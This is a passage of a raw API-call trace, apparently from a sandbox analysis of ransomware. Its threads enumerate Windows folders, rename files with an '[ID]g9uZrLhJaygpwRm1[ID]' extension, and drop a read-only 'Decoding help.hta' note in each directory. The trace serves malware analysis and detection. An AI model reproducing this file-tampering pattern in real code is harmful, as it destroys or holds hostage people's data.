lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.139] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Shared" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared" [0039.139] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*.*" [0039.139] GlobalMemoryStatus (in: lpBuffer=0x440fd10 | out: lpBuffer=0x440fd10) [0039.139] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95e1c80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d4 [0039.147] CloseHandle (hObject=0x1d4) returned 1 [0039.148] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13600, dwReserved0=0x0, dwReserved1=0x0, cFileName="soniccolorconverter.ax", cAlternateFileName="")) returned 1 [0039.148] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.148] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.148] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.148] lstrcmpiW (lpString1="Decoding help.hta", lpString2="soniccolorconverter.ax") returned -1 [0039.148] lstrlenW (lpString="soniccolorconverter.ax") returned 22 [0039.148] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.148] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.148] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="soniccolorconverter.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax" [0039.148] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax" [0039.148] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax.[ID]g9uZrLhJaygpwRm1[ID]" [0039.148] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax" (normalized: "c:\\program files\\dvd maker\\soniccolorconverter.ax"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\soniccolorconverter.ax.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.148] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bdd9df, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bdd9df, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sonicsptransform.ax", cAlternateFileName="")) returned 1 [0039.148] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.148] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.148] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.148] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sonicsptransform.ax") returned -1 [0039.148] lstrlenW (lpString="sonicsptransform.ax") returned 19 [0039.148] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.148] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.149] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="sonicsptransform.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax" [0039.149] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax" [0039.149] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax.[ID]g9uZrLhJaygpwRm1[ID]" [0039.149] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax" (normalized: "c:\\program files\\dvd maker\\sonicsptransform.ax"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\sonicsptransform.ax.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.149] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bb787f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bb787f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMM2CLIP.dll", cAlternateFileName="")) returned 1 [0039.149] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.149] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.149] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.149] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.149] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMM2CLIP.dll") returned -1 [0039.149] lstrlenW (lpString="WMM2CLIP.dll") returned 12 [0039.149] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.149] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.149] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="WMM2CLIP.dll" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll") returned="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll" [0039.149] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll") returned="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll" [0039.149] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.149] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll" (normalized: "c:\\program files\\dvd maker\\wmm2clip.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\wmm2clip.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.149] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bb787f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bb787f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMM2CLIP.dll", cAlternateFileName="")) returned 0 [0039.149] FindClose (in: hFindFile=0x5a5430 | out: hFindFile=0x5a5430) returned 1 Thread: id = 32 os_tid = 0xab4 [0039.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*.*", lpFindFileData=0x454fd30 | out: lpFindFileData=0x454fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a53b0 [0039.045] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.045] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x454fd30 | out: lpFindFileData=0x454fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.045] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.045] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.045] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x454fd30 | out: lpFindFileData=0x454fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.045] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\el-GR\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\el-GR\\*.*") returned="\\\\?\\C:\\Boot\\el-GR\\*.*" [0039.045] lstrlenW (lpString="\\\\?\\C:\\Boot\\el-GR\\*.*") returned 21 [0039.045] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\el-GR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\el-GR\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\el-GR\\Decoding help.hta" [0039.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\Decoding help.hta" (normalized: "c:\\boot\\el-gr\\decoding help.hta")) returned 0xffffffff [0039.045] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\Decoding help.hta" (normalized: "c:\\boot\\el-gr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0039.045] WriteFile (in: hFile=0x1ec, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x454fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x454fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.046] CloseHandle (hObject=0x1ec) returned 1 [0039.046] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.046] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.046] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.047] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\el-GR\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\el-GR\\*.*") returned="\\\\?\\C:\\Boot\\el-GR\\*.*" [0039.047] lstrlenW (lpString="\\\\?\\C:\\Boot\\el-GR\\*.*") returned 21 [0039.047] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\el-GR\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" [0039.047] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" [0039.047] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.047] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.055] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x454fd30 | out: lpFindFileData=0x454fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.055] FindClose (in: hFindFile=0x5a53b0 | out: hFindFile=0x5a53b0) returned 1 Thread: id = 33 os_tid = 0xab8 [0039.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\*.*", lpFindFileData=0x468fd30 | out: lpFindFileData=0x468fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.053] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.053] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x468fd30 | out: lpFindFileData=0x468fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.053] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.053] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.053] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x468fd30 | out: lpFindFileData=0x468fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0039.053] lstrcmpW (lpString1=".", lpString2="Acrobat") returned -1 [0039.053] lstrcmpW (lpString1="..", lpString2="Acrobat") returned -1 [0039.053] lstrcmpiW (lpString1="windows", lpString2="Acrobat") returned 1 [0039.054] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\*.*" [0039.054] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\*.*") returned 28 [0039.055] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\", lpString2="Acrobat" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat" [0039.055] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*.*" [0039.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9478660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x188 [0039.063] CloseHandle (hObject=0x188) returned 1 [0039.063] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x468fd30 | out: lpFindFileData=0x468fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0039.063] lstrcmpW (lpString1=".", lpString2="ARM") returned -1 [0039.063] lstrcmpW (lpString1="..", lpString2="ARM") returned -1 [0039.063] lstrcmpiW (lpString1="windows", lpString2="ARM") returned 1 [0039.064] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\*.*" [0039.064] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\*.*") returned 28 [0039.064] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\", lpString2="ARM" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM" [0039.064] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*.*" [0039.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94a8730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x188 [0039.075] CloseHandle (hObject=0x188) returned 1 [0039.075] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x468fd30 | out: lpFindFileData=0x468fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 0 [0039.075] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 34 os_tid = 0xabc [0039.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*", lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbdc44680, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0xbdc44680, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52b0 [0039.060] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.060] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbdc44680, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0xbdc44680, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.060] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.060] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.060] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8386f760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8386f760, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0039.060] lstrcmpW (lpString1=".", lpString2="Adobe") returned -1 [0039.060] lstrcmpW (lpString1="..", lpString2="Adobe") returned -1 [0039.060] lstrcmpiW (lpString1="windows", lpString2="Adobe") returned 1 [0039.062] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" [0039.062] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned 43 [0039.062] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\", lpString2="Adobe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe" [0039.062] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\*.*" [0039.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94906c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.072] CloseHandle (hObject=0x1ac) returned 1 [0039.072] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801ae160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x801d42c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x801d42c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0039.072] lstrcmpW (lpString1=".", lpString2="Java") returned -1 [0039.072] lstrcmpW (lpString1="..", lpString2="Java") returned -1 [0039.072] lstrcmpiW (lpString1="windows", lpString2="Java") returned 1 [0039.074] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" [0039.074] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned 43 [0039.074] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\", lpString2="Java" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java" [0039.074] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files 